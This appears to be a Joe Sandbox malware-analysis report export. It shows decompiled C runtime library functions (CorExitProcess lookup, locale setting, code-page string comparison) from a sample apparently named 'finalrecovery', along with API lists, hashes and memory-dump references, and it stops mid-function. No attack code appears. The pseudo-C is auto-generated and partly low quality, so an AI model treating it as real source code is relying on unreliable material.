APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00417B66,0041CB9F,?,00417B2E,00000000,?,0041CB9F), ref: 00417B86
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00417B99
FreeLibrary.KERNEL32(00000000,?,?,00417B66,0041CB9F,?,00417B2E,00000000,?,0041CB9F), ref: 00417BBC

Strings

mscoree.dll, xrefs: 00417B7F
CorExitProcess, xrefs: 00417B91

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 45b6e53430105db54ba727b51daa37ece34f640119c748234f3aa513a62590f8
Instruction ID: 884d441533d3cbcde9fceac08862ea4c08368bee60606d7f9997939667a48a9a
Opcode Fuzzy Hash: 45b6e53430105db54ba727b51daa37ece34f640119c748234f3aa513a62590f8
Instruction Fuzzy Hash: C7F08230605218FBDB219B51DD09FDE7F78EB00755F5040A1E801A21A0CB749F41DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 10005F3A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E10005F3A(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x10010164(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x10005f40
0x10005f44
0x10005f4f
0x10005f57
0x10005f62
0x10005f68
0x10005f6c
0x10005f73
0x10005f79
0x10005f79
0x10005f7b
0x10005f80
0x00000000
0x10005f85
0x10005f8c

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005EEC,?,?,10005EB4,?,?,?), ref: 10005F4F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005F62
FreeLibrary.KERNEL32(00000000,?,?,10005EEC,?,?,10005EB4,?,?,?), ref: 10005F85

Strings

mscoree.dll, xrefs: 10005F48
CorExitProcess, xrefs: 10005F5A

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a92dd6ee9455718260ff769fba3d84206b4ff5d332a667860e5915fee9962ce5
Instruction ID: 5d97cbf2e90a002395eb764664fc29351f92a058c747e73b170257a64bfa326c
Opcode Fuzzy Hash: a92dd6ee9455718260ff769fba3d84206b4ff5d332a667860e5915fee9962ce5
Instruction Fuzzy Hash: 38F01231605129FBEB02DB91CD49BAE7AB5EB44796F104164F541A2160CFB5DE00DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0041BE7C Relevance: 7.8, APIs: 5, Instructions: 255
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E0041BE7C(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				intOrPtr _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int* _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				intOrPtr _v772;
				signed int _v784;
				void* __ebp;
				signed int _t156;
				void* _t163;
				signed int _t164;
				signed int _t166;
				signed int _t167;
				intOrPtr _t168;
				signed int _t171;
				signed int _t173;
				signed int _t174;
				signed int _t177;
				signed int _t179;
				signed int _t182;
				signed int _t183;
				signed int _t185;
				signed int _t186;
				signed int _t202;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t212;
				void* _t213;
				signed int _t220;
				intOrPtr* _t221;
				char* _t228;
				intOrPtr _t232;
				intOrPtr* _t233;
				signed int _t235;
				signed int _t240;
				signed int _t241;
				intOrPtr _t246;
				void* _t247;
				void* _t250;
				signed int _t252;
				signed int _t254;
				signed int _t257;
				signed int* _t258;
				short _t259;
				signed int _t260;
				void* _t262;
				void* _t263;
				void* _t264;

				_t244 = __edx;
				_t156 =  *0x43d054; // 0x8e1b5714
				_v8 = _t156 ^ _t260;
				_push(__ebx);
				_t212 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v736 = _t212;
				_v732 = E0041CAE3(__ecx, __edx) + 0x278;
				_t163 = E0041B567(_t212, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v716);
				_t263 = _t262 + 0x18;
				if(_t163 == 0) {
					L39:
					_t164 = 0;
					__eflags = 0;
					goto L40;
				} else {
					_t10 = _t212 + 2; // 0x6
					_t252 = _t10 << 4;
					_t166 =  &_v272;
					_v712 = _t252;
					_t244 =  *(_t252 + _t246);
					_t220 = _t244;
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t254 = _v712;
						if( *_t166 !=  *_t220) {
							break;
						}
						if( *_t166 == 0) {
							L6:
							_t167 = _v704;
						} else {
							_t259 =  *((intOrPtr*)(_t166 + 2));
							_v706 = _t259;
							_t254 = _v712;
							if(_t259 !=  *((intOrPtr*)(_t220 + 2))) {
								break;
							} else {
								_t166 = _t166 + 4;
								_t220 = _t220 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L6;
								}
							}
						}
						L8:
						if(_t167 != 0) {
							_t221 =  &_v272;
							_t244 = _t221 + 2;
							do {
								_t168 =  *_t221;
								_t221 = _t221 + 2;
								__eflags = _t168 - _v704;
							} while (_t168 != _v704);
							_v708 = (_t221 - _t244 >> 1) + 1;
							_t171 = E0041ECAF(4 + ((_t221 - _t244 >> 1) + 1) * 2);
							_v724 = _t171;
							__eflags = _t171;
							if(_t171 == 0) {
								goto L39;
							} else {
								_v720 =  *((intOrPtr*)(_t254 + _t246));
								_v740 =  *(_t246 + 0xa0 + _t212 * 4);
								_v744 =  *(_t246 + 8);
								_t228 =  &_v272;
								_v728 = _t171 + 4;
								_t173 = E00421411(_t171 + 4, _v708, _t228);
								_t264 = _t263 + 0xc;
								__eflags = _t173;
								if(_t173 != 0) {
									_t174 = _v704;
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									E004134C4();
									asm("int3");
									_push(_t260);
									_push(_t228);
									_v784 = _v784 & 0x00000000;
									_t177 = E0041E7A1(_v772, 0x20001004,  &_v784, 2);
									__eflags = _t177;
									if(_t177 == 0) {
										L49:
										return 0xfde9;
									}
									_t179 = _v12;
									__eflags = _t179;
									if(_t179 == 0) {
										goto L49;
									}
									return _t179;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t254 + _t246)) = _v728;
									if(_v272 != 0x43) {
										L17:
										_t182 = E0041B284(_t212, _t246,  &_v700);
										_t244 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L17;
										} else {
											_t244 = _v704;
											_t182 = _t244;
										}
									}
									 *(_t246 + 0xa0 + _t212 * 4) = _t182;
									__eflags = _t212 - 2;
									if(_t212 != 2) {
										__eflags = _t212 - 1;
										if(_t212 != 1) {
											__eflags = _t212 - 5;
											if(_t212 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v716;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v716;
										}
									} else {
										_t258 = _v732;
										 *(_t246 + 8) = _v716;
										_v708 = _t258[8];
										_t240 = _t258[9];
										_v716 = _t240;
										while(1) {
											__eflags =  *(_t246 + 8) -  *(_t258 + _t244 * 8);
											if( *(_t246 + 8) ==  *(_t258 + _t244 * 8)) {
												break;
											}
											_t210 =  *(_t258 + _t244 * 8);
											_t240 =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _v716;
											_t244 = _t244 + 1;
											_t212 = _v736;
											_v708 = _t210;
											_v716 = _t240;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L25:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t202 = E004217F5(__eflags, _v704, 1, 0x431520, 0x7f,  &_v528,  *(_t246 + 8), 1);
												_t264 = _t264 + 0x1c;
												__eflags = _t202;
												if(_t202 == 0) {
													_t241 = _v704;
												} else {
													_t204 = _v704;
													do {
														 *(_t260 + _t204 * 2 - 0x20c) =  *(_t260 + _t204 * 2 - 0x20c) & 0x000001ff;
														_t204 = _t204 + 1;
														__eflags = _t204 - 0x7f;
													} while (_t204 < 0x7f);
													_t206 = E00410BDA( &_v528,  *0x43d1c4, 0xfe);
													_t264 = _t264 + 0xc;
													__eflags = _t206;
													_t241 = 0 | _t206 == 0x00000000;
												}
												_t258[1] = _t241;
												 *_t258 =  *(_t246 + 8);
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L37;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _t240;
										}
										goto L25;
									}
									L37:
									_t183 = _t212 * 0xc;
									_t111 = _t183 + 0x4315a8; // 0x40b1b0
									 *0x42e234(_t246);
									_t185 =  *((intOrPtr*)( *_t111))();
									_t232 = _v720;
									__eflags = _t185;
									if(_t185 == 0) {
										__eflags = _t232 - 0x43d290;
										if(_t232 == 0x43d290) {
											L44:
											_t186 = _v712;
										} else {
											_t257 = _t212 + _t212;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L44;
											} else {
												E0041E238( *((intOrPtr*)(_t246 + 0x28 + _t257 * 8)));
												E0041E238( *((intOrPtr*)(_t246 + 0x24 + _t257 * 8)));
												E0041E238( *(_t246 + 0xa0 + _t212 * 4));
												_t186 = _v712;
												_t235 = _v704;
												 *(_t186 + _t246) = _t235;
												 *(_t246 + 0xa0 + _t212 * 4) = _t235;
											}
										}
										_t233 = _v724;
										 *_t233 = 1;
										_t164 =  *(_t186 + _t246);
										 *((intOrPtr*)(_t246 + 0x28 + (_t212 + _t212) * 8)) = _t233;
									} else {
										 *((intOrPtr*)(_v712 + _t246)) = _t232;
										E0041E238( *(_t246 + 0xa0 + _t212 * 4));
										 *(_t246 + 0xa0 + _t212 * 4) = _v740;
										E0041E238(_v724);
										 *(_t246 + 8) = _v744;
										goto L39;
									}
									goto L40;
								}
							}
						} else {
							_t164 = _t244;
							L40:
							_pop(_t247);
							_pop(_t250);
							_pop(_t213);
							return E0040EB3F(_t164, _t213, _v8 ^ _t260, _t244, _t247, _t250);
						}
						goto L51;
					}
					asm("sbb eax, eax");
					_t167 = _t166 | 0x00000001;
					__eflags = _t167;
					goto L8;
				}
				L51:
			}

0x0041be7c
0x0041be87
0x0041be8e
0x0041be91
0x0041be92
0x0041be95
0x0041be99
0x0041be9a
0x0041be9d
0x0041bead
0x0041bed0
0x0041bed5
0x0041beda
0x0041c190
0x0041c190
0x0041c190
0x00000000
0x0041bee0
0x0041bee0
0x0041bee3
0x0041bee6
0x0041beec
0x0041bef2
0x0041bef5
0x0041bef7
0x0041befa
0x0041bf04
0x0041bf0a
0x00000000
0x00000000
0x0041bf10
0x0041bf39
0x0041bf39
0x0041bf12
0x0041bf12
0x0041bf1a
0x0041bf21
0x0041bf27
0x00000000
0x0041bf29
0x0041bf29
0x0041bf2c
0x0041bf37
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bf37
0x0041bf27
0x0041bf46
0x0041bf48
0x0041bf51
0x0041bf57
0x0041bf5a
0x0041bf5a
0x0041bf5d
0x0041bf60
0x0041bf60
0x0041bf70
0x0041bf7e
0x0041bf83
0x0041bf8a
0x0041bf8c
0x00000000
0x0041bf92
0x0041bf98
0x0041bfa5
0x0041bfae
0x0041bfb4
0x0041bfc1
0x0041bfc8
0x0041bfcd
0x0041bfd0
0x0041bfd2
0x0041c210
0x0041c216
0x0041c217
0x0041c218
0x0041c219
0x0041c21a
0x0041c21b
0x0041c220
0x0041c223
0x0041c226
0x0041c227
0x0041c239
0x0041c23e
0x0041c240
0x0041c249
0x00000000
0x0041c249
0x0041c242
0x0041c245
0x0041c247
0x00000000
0x00000000
0x0041c24f
0x0041bfd8
0x0041bfd8
0x0041bfe6
0x0041bfe9
0x0041bfff
0x0041c006
0x0041c00b
0x0041bfeb
0x0041bfeb
0x0041bff3
0x00000000
0x0041bff5
0x0041bff5
0x0041bffb
0x0041bffb
0x0041bff3
0x0041c012
0x0041c019
0x0041c01c
0x0041c11a
0x0041c11d
0x0041c12a
0x0041c12d
0x0041c135
0x0041c135
0x0041c11f
0x0041c125
0x0041c125
0x0041c022
0x0041c022
0x0041c02e
0x0041c034
0x0041c03a
0x0041c03d
0x0041c043
0x0041c046
0x0041c049
0x00000000
0x00000000
0x0041c04b
0x0041c054
0x0041c058
0x0041c061
0x0041c065
0x0041c066
0x0041c06c
0x0041c072
0x0041c078
0x0041c07b
0x00000000
0x00000000
0x0041c07d
0x0041c09c
0x0041c09c
0x0041c09f
0x0041c0bc
0x0041c0c1
0x0041c0c4
0x0041c0c6
0x0041c104
0x0041c0c8
0x0041c0c8
0x0041c0ce
0x0041c0d3
0x0041c0db
0x0041c0dc
0x0041c0dc
0x0041c0f3
0x0041c0fa
0x0041c0fd
0x0041c0ff
0x0041c0ff
0x0041c10a
0x0041c110
0x0041c110
0x0041c115
0x00000000
0x0041c115
0x0041c07f
0x0041c081
0x0041c086
0x0041c08c
0x0041c095
0x0041c098
0x0041c098
0x00000000
0x0041c081
0x0041c138
0x0041c138
0x0041c13c
0x0041c144
0x0041c14a
0x0041c14d
0x0041c153
0x0041c155
0x0041c1a1
0x0041c1a7
0x0041c1f3
0x0041c1f3
0x0041c1a9
0x0041c1ae
0x0041c1ae
0x0041c1b4
0x0041c1b8
0x00000000
0x0041c1ba
0x0041c1be
0x0041c1c7
0x0041c1d3
0x0041c1d8
0x0041c1e1
0x0041c1e7
0x0041c1ea
0x0041c1ea
0x0041c1b8
0x0041c1f9
0x0041c201
0x0041c207
0x0041c20a
0x0041c157
0x0041c15d
0x0041c167
0x0041c179
0x0041c180
0x0041c18d
0x00000000
0x0041c18d
0x00000000
0x0041c155
0x0041bfd2
0x0041bf4a
0x0041bf4a
0x0041c192
0x0041c195
0x0041c196
0x0041c199
0x0041c1a0
0x0041c1a0
0x00000000
0x0041bf48
0x0041bf41
0x0041bf43
0x0041bf43
0x00000000
0x0041bf43
0x00000000

APIs

Part of subcall function 0041CAE3: GetLastError.KERNEL32(?,?,?,004135E1,?,00000000,00405D9E,?,00418114,?,00000000,74CB6490,?,0041820D,00405D9E,00000000), ref: 0041CAE8
Part of subcall function 0041CAE3: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00418114,?,00000000,74CB6490,?,0041820D,00405D9E,00000000,?,00405D9E,?), ref: 0041CB86

_free.LIBCMT ref: 0041C167
_free.LIBCMT ref: 0041C180
_free.LIBCMT ref: 0041C1BE
_free.LIBCMT ref: 0041C1C7
_free.LIBCMT ref: 0041C1D3

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: 214e3a9f168a88bcf07201969dbc38d6ac597e496d9aed157e134e10b5c5ef5e
Instruction ID: 12d7d066b98f0588a308fb8beaf8faf539c78727b83e721a548b39c81119b340
Opcode Fuzzy Hash: 214e3a9f168a88bcf07201969dbc38d6ac597e496d9aed157e134e10b5c5ef5e
Instruction Fuzzy Hash: A9B16975A412199BDB24DF29CC84AEAB7B4FF48304F5045AEE80AA7351D734AED0CF84

Uniqueness

Uniqueness Score: -1.00%

Function 0042A48A Relevance: 7.7, APIs: 5, Instructions: 244
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E0042A48A(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t55;
				intOrPtr* _t60;
				int _t62;
				signed int _t65;
				signed int _t66;
				intOrPtr* _t67;
				void* _t69;
				signed int _t70;
				signed int _t71;
				intOrPtr* _t77;
				char* _t79;
				char* _t80;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr* _t102;
				signed int _t104;
				void* _t105;
				intOrPtr* _t107;
				void* _t108;
				intOrPtr* _t109;

				_t55 =  *0x43d054; // 0x8e1b5714
				_v8 = _t55 ^ _t104;
				_t103 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t59 = _a24;
				_v40 = _a24;
				_t102 = _a16;
				_v36 = _t102;
				if(_t103 <= 0) {
					if(_t103 < 0xffffffff) {
						goto L60;
					} else {
						goto L3;
					}
				} else {
					_t103 = E00419C0D(_t102, _t103);
					_t59 = _v40;
					L3:
					_t85 = _a28;
					if(_t85 <= 0) {
						if(_t85 < 0xffffffff) {
							goto L60;
						} else {
							goto L6;
						}
					} else {
						_t85 = E00419C0D(_t59, _t85);
						L6:
						_t62 = _a32;
						if(_t62 == 0) {
							_t62 =  *( *_v44 + 8);
							_a32 = _t62;
						}
						if(_t103 == 0 || _t85 == 0) {
							if(_t103 == _t85) {
								L59:
								_push(2);
								goto L22;
							} else {
								if(_t85 > 1) {
									L31:
									_t60 = 1;
								} else {
									if(_t103 > 1) {
										L21:
										_push(3);
										goto L22;
									} else {
										if(GetCPInfo(_t62,  &_v28) == 0) {
											goto L60;
										} else {
											if(_t103 <= 0) {
												if(_t85 <= 0) {
													goto L32;
												} else {
													if(_v28 >= 2) {
														_t79 =  &_v22;
														if(_v22 != 0) {
															_t103 = _v40;
															while(1) {
																_t95 =  *((intOrPtr*)(_t79 + 1));
																if(_t95 == 0) {
																	goto L31;
																}
																_t101 =  *_t103;
																if(_t101 <  *_t79 || _t101 > _t95) {
																	_t79 = _t79 + 2;
																	if( *_t79 != 0) {
																		continue;
																	} else {
																		goto L31;
																	}
																} else {
																	goto L59;
																}
																goto L61;
															}
														}
													}
													goto L31;
												}
											} else {
												if(_v28 >= 2) {
													_t80 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t96 =  *((intOrPtr*)(_t80 + 1));
															if(_t96 == 0) {
																goto L21;
															}
															_t101 =  *_t102;
															if(_t101 <  *_t80 || _t101 > _t96) {
																_t80 = _t80 + 2;
																if( *_t80 != 0) {
																	continue;
																} else {
																	goto L21;
																}
															} else {
																goto L59;
															}
															goto L22;
														}
													}
												}
												goto L21;
												L22:
												_pop(_t60);
											}
										}
									}
								}
							}
						} else {
							L32:
							_t102 = 0;
							_t65 = E0041FDC8(_a32, 9, _v36, _t103, 0, 0);
							_t107 = _t105 + 0x18;
							_v44 = _t65;
							if(_t65 == 0) {
								L60:
								_t60 = 0;
							} else {
								_t101 = _t65 + _t65 + 8;
								asm("sbb eax, eax");
								_t66 = _t65 & _t65 + _t65 + 0x00000008;
								if(_t66 == 0) {
									_t67 = 0;
									_v32 = 0;
									goto L41;
								} else {
									if(_t66 > 0x400) {
										_t77 = E0041ECAF(_t66);
										_v32 = _t77;
										if(_t77 == 0) {
											goto L57;
										} else {
											 *_t77 = 0xdddd;
											goto L39;
										}
									} else {
										E0040F500(_t66);
										_t77 = _t107;
										_v32 = _t77;
										if(_t77 == 0) {
											L57:
											_t85 = _v32;
										} else {
											 *_t77 = 0xcccc;
											L39:
											_t67 = _t77 + 8;
											_v32 = _t67;
											L41:
											if(_t67 == 0) {
												goto L57;
											} else {
												_t103 = _a32;
												_t69 = E0041FDC8(_a32, 1, _v36, _a32, _t67, _v44);
												_t108 = _t107 + 0x18;
												if(_t69 == 0) {
													goto L57;
												} else {
													_t70 = E0041FDC8(_t103, 9, _v40, _t85, _t102, _t102);
													_t109 = _t108 + 0x18;
													_v36 = _t70;
													if(_t70 == 0) {
														goto L57;
													} else {
														_t101 = _t70 + _t70 + 8;
														asm("sbb eax, eax");
														_t71 = _t70 & _t70 + _t70 + 0x00000008;
														if(_t71 == 0) {
															_t103 = _t102;
															goto L52;
														} else {
															if(_t71 > 0x400) {
																_t103 = E0041ECAF(_t71);
																if(_t103 == 0) {
																	goto L55;
																} else {
																	 *_t103 = 0xdddd;
																	goto L50;
																}
															} else {
																E0040F500(_t71);
																_t103 = _t109;
																if(_t103 == 0) {
																	L55:
																	_t85 = _v32;
																} else {
																	 *_t103 = 0xcccc;
																	L50:
																	_t103 = _t103 + 8;
																	L52:
																	if(_t103 == 0 || E0041FDC8(_a32, 1, _v40, _t85, _t103, _v36) == 0) {
																		goto L55;
																	} else {
																		_t85 = _v32;
																		_t102 = E0041E5F1(_v48, _a12, _v32, _v44, _t103, _v36, _t102, _t102, _t102);
																	}
																}
															}
														}
														E0040EB21(_t103);
													}
												}
											}
										}
									}
								}
								E0040EB21(_t85);
								_t60 = _t102;
							}
						}
					}
				}
				L61:
				return E0040EB3F(_t60, _t85, _v8 ^ _t104, _t101, _t102, _t103);
			}

0x0042a492
0x0042a499
0x0042a4a1
0x0042a4a4
0x0042a4aa
0x0042a4ad
0x0042a4b0
0x0042a4b4
0x0042a4b7
0x0042a4bc
0x0042a4d1
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a4be
0x0042a4c6
0x0042a4c8
0x0042a4d7
0x0042a4d7
0x0042a4dc
0x0042a4ee
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a4de
0x0042a4e7
0x0042a4f4
0x0042a4f4
0x0042a4f9
0x0042a500
0x0042a503
0x0042a503
0x0042a508
0x0042a514
0x0042a6fa
0x0042a6fa
0x00000000
0x0042a51a
0x0042a51d
0x0042a5a6
0x0042a5a8
0x0042a523
0x0042a526
0x0042a56b
0x0042a56b
0x00000000
0x0042a528
0x0042a535
0x00000000
0x0042a53b
0x0042a53d
0x0042a575
0x00000000
0x0042a577
0x0042a57b
0x0042a581
0x0042a584
0x0042a586
0x0042a589
0x0042a589
0x0042a58e
0x00000000
0x00000000
0x0042a590
0x0042a594
0x0042a59e
0x0042a5a4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a594
0x0042a589
0x0042a584
0x00000000
0x0042a57b
0x0042a53f
0x0042a543
0x0042a549
0x0042a54c
0x0042a54e
0x0042a54e
0x0042a553
0x00000000
0x00000000
0x0042a555
0x0042a559
0x0042a563
0x0042a569
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a559
0x0042a54e
0x0042a54c
0x00000000
0x0042a56d
0x0042a56d
0x0042a56d
0x0042a53d
0x0042a535
0x0042a526
0x0042a51d
0x0042a5ae
0x0042a5ae
0x0042a5ae
0x0042a5bb
0x0042a5c0
0x0042a5c3
0x0042a5c8
0x0042a701
0x0042a701
0x0042a5ce
0x0042a5d1
0x0042a5d6
0x0042a5d8
0x0042a5da
0x0042a61d
0x0042a61f
0x00000000
0x0042a5dc
0x0042a5e1
0x0042a5fe
0x0042a603
0x0042a609
0x00000000
0x0042a60f
0x0042a60f
0x00000000
0x0042a60f
0x0042a5e3
0x0042a5e3
0x0042a5e8
0x0042a5ea
0x0042a5ef
0x0042a6ec
0x0042a6ec
0x0042a5f5
0x0042a5f5
0x0042a615
0x0042a615
0x0042a618
0x0042a622
0x0042a624
0x00000000
0x0042a62a
0x0042a632
0x0042a638
0x0042a63d
0x0042a642
0x00000000
0x0042a648
0x0042a651
0x0042a656
0x0042a659
0x0042a65e
0x00000000
0x0042a664
0x0042a667
0x0042a66c
0x0042a66e
0x0042a670
0x0042a6a4
0x00000000
0x0042a672
0x0042a677
0x0042a692
0x0042a697
0x00000000
0x0042a699
0x0042a699
0x00000000
0x0042a699
0x0042a679
0x0042a679
0x0042a67e
0x0042a682
0x0042a6e0
0x0042a6e0
0x0042a684
0x0042a684
0x0042a69f
0x0042a69f
0x0042a6a6
0x0042a6a8
0x00000000
0x0042a6c3
0x0042a6c3
0x0042a6dc
0x0042a6dc
0x0042a6a8
0x0042a682
0x0042a677
0x0042a6e4
0x0042a6e9
0x0042a65e
0x0042a642
0x0042a624
0x0042a5ef
0x0042a5e1
0x0042a6f0
0x0042a6f6
0x0042a6f6
0x0042a5c8
0x0042a508
0x0042a4dc
0x0042a703
0x0042a714

APIs

GetCPInfo.KERNEL32(00000000,00000001,8E1B5714,7FFFFFFF,?,?,0042A746,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0042A52D
__alloca_probe_16.LIBCMT ref: 0042A5E3
__alloca_probe_16.LIBCMT ref: 0042A679
__freea.LIBCMT ref: 0042A6E4
__freea.LIBCMT ref: 0042A6F0

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: f8b56ffb658fd79a13cf8f1a4e834b6736d8d54e0c4b31b1dddf638d6e353ce6
Instruction ID: 0fae774246e0f92b6ccdf6169e27fb8b70594b67fc2417edd7fe420cae46b77a
Opcode Fuzzy Hash: f8b56ffb658fd79a13cf8f1a4e834b6736d8d54e0c4b31b1dddf638d6e353ce6
Instruction Fuzzy Hash: 4081F571B002256BDF219E65A941EEF7BB59F49314F98005BEC40A7341E739CCA1CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 1000A56D Relevance: 7.7, APIs: 5, Instructions: 244
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E1000A56D(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t55;
				intOrPtr* _t60;
				int _t62;
				signed int _t65;
				signed int _t66;
				intOrPtr* _t67;
				void* _t69;
				signed int _t70;
				signed int _t71;
				intOrPtr* _t77;
				char* _t79;
				char* _t80;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr* _t102;
				signed int _t104;
				void* _t105;
				intOrPtr* _t107;
				void* _t108;
				intOrPtr* _t109;

				_t55 =  *0x10017004; // 0xb1cc4d85
				_v8 = _t55 ^ _t104;
				_t103 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t59 = _a24;
				_v40 = _a24;
				_t102 = _a16;
				_v36 = _t102;
				if(_t103 <= 0) {
					if(_t103 < 0xffffffff) {
						goto L60;
					} else {
						goto L3;
					}
				} else {
					_t103 = E1000C6A1(_t102, _t103);
					_t59 = _v40;
					L3:
					_t85 = _a28;
					if(_t85 <= 0) {
						if(_t85 < 0xffffffff) {
							goto L60;
						} else {
							goto L6;
						}
					} else {
						_t85 = E1000C6A1(_t59, _t85);
						L6:
						_t62 = _a32;
						if(_t62 == 0) {
							_t62 =  *( *_v44 + 8);
							_a32 = _t62;
						}
						if(_t103 == 0 || _t85 == 0) {
							if(_t103 == _t85) {
								L59:
								_push(2);
								goto L22;
							} else {
								if(_t85 > 1) {
									L31:
									_t60 = 1;
								} else {
									if(_t103 > 1) {
										L21:
										_push(3);
										goto L22;
									} else {
										if(GetCPInfo(_t62,  &_v28) == 0) {
											goto L60;
										} else {
											if(_t103 <= 0) {
												if(_t85 <= 0) {
													goto L32;
												} else {
													if(_v28 >= 2) {
														_t79 =  &_v22;
														if(_v22 != 0) {
															_t103 = _v40;
															while(1) {
																_t95 =  *((intOrPtr*)(_t79 + 1));
																if(_t95 == 0) {
																	goto L31;
																}
																_t101 =  *_t103;
																if(_t101 <  *_t79 || _t101 > _t95) {
																	_t79 = _t79 + 2;
																	if( *_t79 != 0) {
																		continue;
																	} else {
																		goto L31;
																	}
																} else {
																	goto L59;
																}
